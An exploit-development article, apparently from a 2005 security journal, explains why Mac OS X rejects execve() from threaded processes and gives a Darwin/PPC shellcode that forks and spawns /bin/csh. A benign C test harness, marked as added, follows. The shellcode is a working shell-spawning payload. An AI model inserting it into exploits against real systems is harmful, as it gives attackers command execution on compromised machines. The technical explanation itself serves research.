Uninformed: Informative Information for the Uninformed

Vol 1» 2005.May


Threads and Execve

Mac OS X has an undocumented behavior concerning the execve() system call inside a threaded process: if a process with more than one active thread calls execve(), the kernel rejects the call with the error EOPNOTSUPP. A closer look at kern_exec.c in the Darwin XNU source code shows that for shellcode to function properly inside a threaded process, it needs to call either fork() or vfork() before calling execve(); the child created by fork() contains only the calling thread, so its execve() is not rejected.

;;
;; Fork and execute a command shell
;;
;; Darwin/PPC syscall convention: on error the kernel returns to the
;; instruction right after "sc"; on success it skips that instruction.
;; Each "b _exitproc" following an "sc" is therefore the error path only.
;;
main:
_fork:
    li      r0, 2               ; SYS_fork
    sc
    b       _exitproc           ; fork() failed

                                ; parent and child both fall through: in a
                                ; threaded process the parent's execve()
                                ; fails (EOPNOTSUPP) and it exits, while the
                                ; single-threaded child runs the shell
_execsh:                        ; based on ghandi's execve
    xor.    r5, r5, r5          ; r5 = 0 (envp = NULL), sets CR0[EQ]
    bnel    _execsh             ; never taken, but LR = address of next insn
    mflr    r3                  ; r3 = address of this mflr
    addi    r3, r3, 32          ; r3 = &_path (32 bytes past the mflr)
    stw     r3, -8(r1)          ; argv[0] = path
    stw     r5, -4(r1)          ; argv[1] = NULL
    subi    r4, r1, 8           ; r4 = {path, 0}
    li      r0, 59              ; SYS_execve
    sc                          ; execve(path, argv, NULL)
    b       _exitproc           ; execve() failed

_path:
    .ascii "/bin/csh"           ; csh handles seteuid() for us
    .long   0                   ; NUL terminator (and alignment padding)

_exitproc:
    li      r0, 1               ; SYS_exit
    li      r3, 0               ; exit(0)
    sc
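The following C harness is an added example, not code from the original article: it reproduces the situation described above by attempting execve() from a process that has two threads, either directly or (as the shellcode does) from a fork()ed single-threaded child, and reports which errno execve() returned. The helper name exec_from_threaded_process and the use of "/bin/sh -c 'exit 0'" as the target program are assumptions of this example.

```c
#include <errno.h>
#include <pthread.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* A second thread that only blocks, so the process is multi-threaded
   when execve() is attempted. */
static void *idle_thread(void *arg) {
    (void)arg;
    for (;;) pause();
    return NULL;
}

/* Converts a wait status into an 8-bit result (255 if killed by a signal). */
static int exit_code(int status) {
    return WIFEXITED(status) ? WEXITSTATUS(status) : 255;
}

/* Attempts execve(argv[0], argv) from a process that has two threads.
 * With fork_first == 0 the threaded process calls execve() itself; with
 * fork_first != 0 it forks and the single-threaded child calls execve(),
 * which is what the shellcode above does.  Everything runs in a child of
 * the caller, so the caller survives either way.  Returns 0 when the
 * program was executed and exited 0, otherwise the errno that execve()
 * reported (EOPNOTSUPP on the Mac OS X behaviour described above).
 * argv[0] must name a program that exits 0 for the result to be unambiguous.
 * (Hypothetical helper written for this example.) */
int exec_from_threaded_process(char *const argv[], int fork_first) {
    char *const envp[] = { NULL };
    int status;
    pid_t pid = fork();
    if (pid < 0) return errno;
    if (pid == 0) {
        pthread_t t;
        if (pthread_create(&t, NULL, idle_thread, NULL) != 0) _exit(errno);
        if (fork_first) {
            pid_t child = fork();
            if (child < 0) _exit(errno);
            if (child > 0) {            /* threaded parent: relay the result */
                waitpid(child, &status, 0);
                _exit(exit_code(status));
            }
        }
        execve(argv[0], argv, envp);    /* replaces the process on success */
        _exit(errno);                   /* reached only when execve() fails */
    }
    if (waitpid(pid, &status, 0) < 0) return errno;
    return exit_code(status);
}
```

On a kernel with the behaviour described above the direct attempt returns EOPNOTSUPP while the fork-first attempt returns 0; on kernels that allow execve() from a threaded process both return 0.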